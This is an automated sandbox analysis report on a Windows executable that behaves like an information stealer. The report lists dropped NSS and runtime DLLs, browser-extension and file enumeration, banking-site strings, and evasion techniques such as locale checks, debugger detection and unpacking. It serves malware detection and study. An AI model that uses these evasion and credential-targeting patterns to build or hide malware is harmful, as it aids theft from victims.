Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: mozglue.pdbP source: NK3SASJheq.exe, 00000000.00000002.1867943273.000000006CC2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: NK3SASJheq.exe, 00000000.00000002.1867943273.000000006CC2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Unpacked PE file: 0.2.NK3SASJheq.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Unpacked PE file: 0.2.NK3SASJheq.exe.400000.1.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00419860
PE file contains sections with non-standard names
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0041B035 push ecx; ret 0_2_0041B048
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040020D pushfd ; iretd 0_2_00400211
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBEB536 push ecx; ret 0_2_6CBEB549
Source: NK3SASJheq.exe Static PE information: section name: .text entropy: 7.487988432526942
Drops PE files
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00419860
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\NK3SASJheq.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\NK3SASJheq.exe API coverage: 6.7 %
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E430
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004138B0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BE70
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004016D0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040DA80
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F6B0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00414570
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00414910
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040ED20
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DE10
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_00413EA0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: JEBFIIIE.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: JEBFIIIE.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: JEBFIIIE.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.0000000000A09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: JEBFIIIE.0.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: JEBFIIIE.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: JEBFIIIE.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: NK3SASJheq.exe, 00000000.00000002.1836180792.000000000097E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: JEBFIIIE.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: JEBFIIIE.0.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: JEBFIIIE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: JEBFIIIE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: JEBFIIIE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: JEBFIIIE.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: JEBFIIIE.0.dr Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: JEBFIIIE.0.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: JEBFIIIE.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: JEBFIIIE.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: JEBFIIIE.0.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.00000000009B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: JEBFIIIE.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: JEBFIIIE.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: JEBFIIIE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: JEBFIIIE.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: JEBFIIIE.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: JEBFIIIE.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: JEBFIIIE.0.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: C:\Users\user\Desktop\NK3SASJheq.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NK3SASJheq.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NK3SASJheq.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NK3SASJheq.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NK3SASJheq.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NK3SASJheq.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NK3SASJheq.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NK3SASJheq.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041AD48
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 0_2_004045C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00419860
